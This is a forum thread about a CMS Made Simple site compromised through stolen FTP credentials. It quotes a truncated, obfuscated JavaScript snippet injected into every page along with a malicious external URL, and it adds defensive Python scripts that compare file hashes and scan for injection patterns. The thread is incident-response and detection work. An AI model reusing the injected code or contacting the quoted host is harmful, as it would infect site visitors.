Site hacked?

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
leerraum
Forum Members
Posts: 180
Joined: Wed Apr 22, 2009 2:54 pm

Site hacked?

Post by leerraum »

Hi,

I've worked on a site http://be-box.de for a couple of months, the last time last week. Now the backend behaves a little differently than expected. Tabs don't work etc. On every frontend page I found this script at the bottom:

Code:

<__body>
</__html><!-- 0,339594 / 77 / 30115744 / 30593616 -->


snip........="I";var C=n242;G_=31368;G_-=253;var Rn=String("defe"+"r");var iY=60647;var rT="";var cn={};var BN=p('sPrec_','evk1PDJ4_');var w=X+j;gC=[];ps={n:37096};var QB="";var iv={va:60873};b[BN]=R("htmfv",0,2)+"tp"+":/"+R("/pUwz"d=z;var bU=false;try {var ppE='yY'} catch(ppE){};zF=26489;zF--....snip
I don't know if this is a problem, but when I started with the site, this thing wasn't there.

Additionally there is a GET call to a Russian page:

Code:

http://pendude,ru:8080/4399-com/google.com/comcast.com.php
I don't know this site. And it's Russian. The alert in my head is firing constantly.

My system (mle) looks like this:

Code:

Informationen zur CMSms-Installation:

CMS-Version: 1.6.7

Installierte Module:
CMSMailer 1.73.14
FileManager 1.0.2
MenuManager 1.6.2
ModuleManager 1.3.2
News 2.10.5
nuSOAP 1.0.1
Printing 1.0.4
Search 1.6.3
ThemeManager 1.1.1
TinyMCE 2.6.2
Products 2.7.4
CGExtensions 1.18.8
CGSimpleSmarty 1.4.4
CGPaymentGatewayBase 1.0.5
Captcha 0.4
Cart 1.6.2
FormBuilder 0.5.12
FrontEndUsers 1.9.2
TemplateExternalizer 1.2
TruetypeText 2.0.2
Orders 1.8.6
CustomContent 1.5.3
CGEcommerceBase 1.1
SelfRegistration 1.4.2
NMS 2.2.2
FRShipping 1.2

Konfigurationsinformationen aus der config.php:
php_memory_limit:
process_whole_template: false
max_upload_size: 64000000
default_upload_permission: 664
assume_mod_rewrite: false
page_extension:
internal_pretty_urls: false
use_hierarchy: true
debug: false
output_compression: false
root_url: http://be-box.de
root_path: /home/www/bornemann/htdocs/ (0777) Erfolgreich abgeschlossen
previews_path: /home/www/bornemann/htdocs/tmp/cache (0777) Erfolgreich abgeschlossen
uploads_path: /home/www/bornemann/htdocs/uploads (0777) Erfolgreich abgeschlossen
uploads_url: http://be-box.de/uploads
image_uploads_path: /home/www/bornemann/htdocs/uploads/images (0777) Erfolgreich abgeschlossen
image_uploads_url: http://be-box.de/uploads/images
use_smarty_php_tags: false
locale: de_DE
default_encoding: utf-8
admin_encoding: utf-8

PHP-Informationen:
Derzeitige PHP-Version (phpversion): 5.2.0-8+etch15 Erfolgreich abgeschlossen
MD5-Funktion (md5_function): An (Ja) Erfolgreich abgeschlossen
GD-Version (gd_version): 2 Erfolgreich abgeschlossen
tempnam-Funktion (tempnam_function): An (Ja) Erfolgreich abgeschlossen
Magic Quotes zur Laufzeit (magic_quotes_runtime): Aus (Nein) Erfolgreich abgeschlossen
PHP-Speicherlimit (memory_limit): 128M Erfolgreich abgeschlossen
Maximale Ausführungszeit (max_execution_time): 30 Achtung ?
PHP Safe-Mode (safe_mode): Aus (Nein) Erfolgreich abgeschlossen
Speicherpfad für Sessions (session_save_path): /var/lib/php5 (1733) Erfolgreich abgeschlossen
Es ist den Sessions erlaubt, Cookies zu verwenden. (session_use_cookies): An (Ja) Erfolgreich abgeschlossen
Prüfung, ob der httpd-Prozeß eine Datei in einem selbst erstellten Verzeichnis erzeugen kann. (create_dir_and_file): Erfolgreich abgeschlossen
PHP - register_globals (register_globals): An (Ja) Achtung ?
PHP - output_buffering (output_buffering): An Erfolgreich abgeschlossen
Deaktivierte PHP-Funktionen (disable_functions): Erfolgreich abgeschlossen
PHP "Open Basedir" (open_basedir): Erfolgreich abgeschlossen
Test der Remote-URL (test_remote_url): Erfolgreich abgeschlossen
fsockopen: Verbindung ok! Erfolgreich abgeschlossen
fopen: Verbindung ok! Erfolgreich abgeschlossen
Hochgeladene Dateien (file_uploads): An (Ja) Erfolgreich abgeschlossen
Maximale Größe für POST-Dateien (post_max_size): 32M Erfolgreich abgeschlossen
Maximale Größe für hochzuladende Dateien (upload_max_filesize): 30M Erfolgreich abgeschlossen
Basis-XML (expat) Unterstützung (xml_function): An (Ja) Erfolgreich abgeschlossen
Test auf file_get_contents (file_get_contents): An (Ja) Erfolgreich abgeschlossen
Test auf ini_set (check_ini_set): An (Ja) Erfolgreich abgeschlossen

Server-Informationen:
Server-API (server_api): apache2handler
Server-Datenbank (server_db_type): MySQL (mysql)
Server-Datenbankversion (server_db_version): 5.0.32 Erfolgreich abgeschlossen
Server-Software (server_software): Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c
Server-Betriebssystem (server_os): Linux 2.6.18-6-amd64 An x86_64

Verzeichnisberechtigungen:
tmp: /home/www/bornemann/htdocs//tmp (0777) Erfolgreich abgeschlossen
templates_c: /home/www/bornemann/htdocs/tmp/templates_c (0777) Erfolgreich abgeschlossen
modules: /home/www/bornemann/htdocs//modules (0777) Erfolgreich abgeschlossen
Maske zum Erstellen von Dateien (umask): /home/www/bornemann/htdocs/tmp/cache (0777) Erfolgreich abgeschlossen
config_file: 0444 Erfolgreich abgeschlossen


Anyone have an idea? Updating is not possible because of some other problems I've faced. I need to find out first what goes wrong and why.

Thanks.
leerraum


// Rolf: Deleted hacked code
// Reneh snipped some more code
Last edited by Rolf on Tue Jun 08, 2010 1:38 pm, edited 1 time in total.
Rolf
Power Poster
Posts: 7825
Joined: Wed Apr 23, 2008 7:53 am

Re: Site hacked?

Post by Rolf »

No doubt, this site has been ftp-hacked and there are one or more non-cmsms files on your server which infect your files. Again and again...  :-[

Grtz. Rolf
- + - + - + - + - + - + -
LATEST TUTORIAL AT CMS CAN BE SIMPLE:
Migrating Company Directory module to LISE
- + - + - + - + - + - + -
leerraum
Forum Members
Posts: 180
Joined: Wed Apr 22, 2009 2:54 pm

Re: Site hacked?

Post by leerraum »

OK, thank you for this prompt reply. What is the best way to solve this problem? (And please don't tell me I have to do all the stuff I did last week again, because I need to upload a clean backup...)
Rolf
Power Poster
Posts: 7825
Joined: Wed Apr 23, 2008 7:53 am

Re: Site hacked?

Post by Rolf »

Your database will be fine.
Just the files on the server are infected...

Change FTP username and password just to be sure.
Make a backup of the existing files and database on a PC with a good virus scanner.

The safest way is to delete all files on the webserver now and put a new clean cmsms set back on.
Do a new install with the same database. DON'T let the installer create tables and default content in step 5!!!! Uncheck these options!!!
After this put back the images etc. one by one.

This is it, in short.
But please do a little search on the forum.
There are more threads with a more detailed explanation there...

Good luck

Rolf
- + - + - + - + - + - + -
LATEST TUTORIAL AT CMS CAN BE SIMPLE:
Migrating Company Directory module to LISE
- + - + - + - + - + - + -
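Rolf's recipe above is to wipe the web root and put a clean CMSMS set back because non-CMSMS files were dropped on the server. Before wiping, a defender usually wants to know exactly which files are extra, modified or missing compared with a clean copy of the same release, both to learn where the attacker wrote and to know which legitimate files (uploads, custom templates, third-party modules) must be restored afterwards. The script below is an added example, not code from this thread or from the CMSMS project; the ignore list (uploads/, tmp/) and the file names in the demo trees are assumptions.

```python
"""Inventory a live web root against a clean copy of the same release.

Added example; not from the thread or the CMSMS project. Compares two
directory trees by SHA-256 and reports extra, modified and missing files.
"""
import hashlib
import os
import tempfile


def hash_tree(root, ignore_prefixes=()):
    """Return {relative_path: sha256_hex} for every regular file under root.

    Paths starting with a prefix in ignore_prefixes are skipped: uploads and
    Smarty caches legitimately differ between a release and a live site.
    """
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(rel.startswith(p) for p in ignore_prefixes):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def compare_trees(clean_root, site_root, ignore_prefixes=("uploads/", "tmp/")):
    """Classify the live site's files relative to the clean release.

    Returns {"extra": [...], "modified": [...], "missing": [...]}, each sorted:
      extra    - on the site but not in the release (dropped files, but also
                 custom templates or third-party modules you added yourself)
      modified - in both, content differs (where injected code usually lives)
      missing  - in the release but absent from the site
    """
    clean = hash_tree(clean_root, ignore_prefixes)
    site = hash_tree(site_root, ignore_prefixes)
    return {
        "extra": sorted(p for p in site if p not in clean),
        "modified": sorted(p for p in site if p in clean and site[p] != clean[p]),
        "missing": sorted(p for p in clean if p not in site),
    }


# Constructed demo trees (file names are invented, not real CMSMS paths).
DEMO_TREES = {
    "clean": {
        "index.php": "<?php echo 'hello'; ?>\n",
        "lib/example.php": "<?php function f() {} ?>\n",
        "config.php": "<?php $config = array(); ?>\n",
    },
    "site": {
        # same index.php with a block appended at the end -> "modified"
        "index.php": "<?php echo 'hello'; ?>\n<script>/* appended */</script>\n",
        "lib/example.php": "<?php function f() {} ?>\n",
        # config.php absent on the site -> "missing"
        "modules/x.php": "<?php /* not part of the release */ ?>\n",  # -> "extra"
        "uploads/images/logo.png": "PNG-DATA",  # ignored: a legitimate upload
    },
}


def build_demo_trees(base):
    """Write DEMO_TREES under base; return (clean_root, site_root)."""
    for tree, files in DEMO_TREES.items():
        for rel, content in files.items():
            path = os.path.join(base, tree, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
    return os.path.join(base, "clean"), os.path.join(base, "site")


def demo():
    """Run the comparison on the constructed trees and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        clean_root, site_root = build_demo_trees(tmp)
        return compare_trees(clean_root, site_root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

On a real incident you would call `compare_trees()` with an untouched extract of the same CMSMS release (1.6.7 here) as the clean side and a copy of the backed-up web root as the site side. The `extra` list will also contain third-party modules and custom templates you installed yourself, so review it rather than deleting blindly; the `modified` list is where to look first for appended script blocks.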
replytomk3

Re: Site hacked?

Post by replytomk3 »

Backup first before deleting - see my signature - and scan the files you backed up with a computer virus scanner (Avast! for example)
leerraum
Forum Members
Posts: 180
Joined: Wed Apr 22, 2009 2:54 pm

Re: Site hacked?

Post by leerraum »

OK, I'll do so tomorrow, after I've called my hoster. What I want to know now is: who's guilty? Because I see the question coming up very fast. Does 1.6.7 have some security problems?
replytomk3

Re: Site hacked?

Post by replytomk3 »

Hosting provider is guilty. However, we also recommend additional security measures implemented (search the forum). You'll also OBVIOUSLY have to change ALL passwords after you recover.
milehigh

Re: Site hacked?

Post by milehigh »

Some FTP clients store FTP usernames/passwords in plain text. An infected computer basically hands this information over to the hacker -- this has nothing to do with your hosting provider.

You need to make sure the computer you are using for FTP access is 100% clean, otherwise you will change all your passwords and the virus will simply hand over the new passwords and you are back to square one with malicious code.

I actually had some first-hand experience with this one... it is not in any way a CMSMS vulnerability, and in a lot of these you can't blame the hosting company, since the method used for adding the code (typically in index, home, default types of files as well as various js files) is simply authenticating via FTP with valid usernames and passwords.
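The first post shows the pattern concretely (a huge single-line script stuffed with `var` assignments, appended after `</html>` and the CMSMS timing comment on every page, plus a request to an external host on port 8080), and milehigh names the usual targets: index/home/default files and the various .js files. The scanner below is an added example, not code from this thread or from CMSMS; it turns those observations into triage checks that can be run over a backed-up web root. The extension list, the `example.invalid` host and the size thresholds are assumptions, and hits are leads to inspect, not proof of infection.

```python
"""Triage scan for the injection pattern described in this thread.

Added example; not code from the thread or from CMSMS. Flags script blocks
after </html>, external script sources with an explicit port, and very dense
or obfuscated single-line JavaScript.
"""
import os
import re
import tempfile

SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl")

CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_OR_IFRAME = re.compile(r"<(script|iframe)\b", re.IGNORECASE)
# a script loaded from an external host that names an explicit port (":8080/")
EXTERNAL_PORT_SRC = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']https?://[^\"'/]+:\d+/", re.IGNORECASE)
# constructs that appear in obfuscated droppers far more often than in site code
OBFUSCATION_HINTS = re.compile(
    r"String\.fromCharCode|\bunescape\s*\(|\beval\s*\(|document\.write\s*\(",
    re.IGNORECASE)


def scan_text(text):
    """Return the reasons why text looks injected; an empty list means clean."""
    reasons = []
    end = CLOSE_HTML.search(text)
    if end and SCRIPT_OR_IFRAME.search(text, end.end()):
        reasons.append("script/iframe after </html>")
    if EXTERNAL_PORT_SRC.search(text):
        reasons.append("external script src with explicit port")
    for lineno, line in enumerate(text.splitlines(), 1):
        # one very long line stuffed with var assignments, as in the thread
        dense = len(line) > 500 and line.count("var ") >= 20
        hinted = len(line) > 200 and OBFUSCATION_HINTS.search(line) is not None
        if dense or hinted:
            reasons.append(f"line {lineno}: dense/obfuscated javascript")
    return reasons


def scan_tree(root):
    """Scan every file under root with a SCAN_EXTENSIONS suffix.

    Returns {relative_path: [reasons]} for the files that produced findings.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                reasons = scan_text(fh.read())
            if reasons:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return findings


# Constructed samples (not the real injected code from the thread).
CLEAN_PAGE = ("<html><head><title>Shop</title></head><body><p>Welcome</p>"
              "</body></html>\n<!-- 0,12 / 9 / 1024 / 2048 -->\n")
INJECTED_PAGE = (CLEAN_PAGE + "<script>"
                 + "".join(f"var v{i}={i};" for i in range(80)) + "</script>\n")
INJECTED_JS = ("function init() {}\n"
               + "var a=String.fromCharCode(104,105);" + "var b=1;" * 40 + "\n")
EXTERNAL_PAGE = ('<html><body><script src="http://example.invalid:8080/x.js">'
                 "</script></body></html>\n")


def demo_tree():
    """Write the samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in [("index.php", INJECTED_PAGE), ("about.html", CLEAN_PAGE),
                           ("js/app.js", INJECTED_JS), ("notes.txt", INJECTED_PAGE)]:
            path = os.path.join(root, *name.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, reasons in demo_tree().items():
        print(f"{path}: {reasons}")
```

Expect false positives from legitimately minified libraries (the TinyMCE module ships plenty of long lines), so use these findings together with a file-by-file comparison against a clean copy of the release: a dense line in a file that also differs from the release is the one to read.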
leerraum
Forum Members
Forum Members
Joined: Wed Apr 22, 2009 2:54 pm

Re: Site hacked?

Post by leerraum »

Hm, I've checked my PC last week in secure mode without results... but I'll check it again now.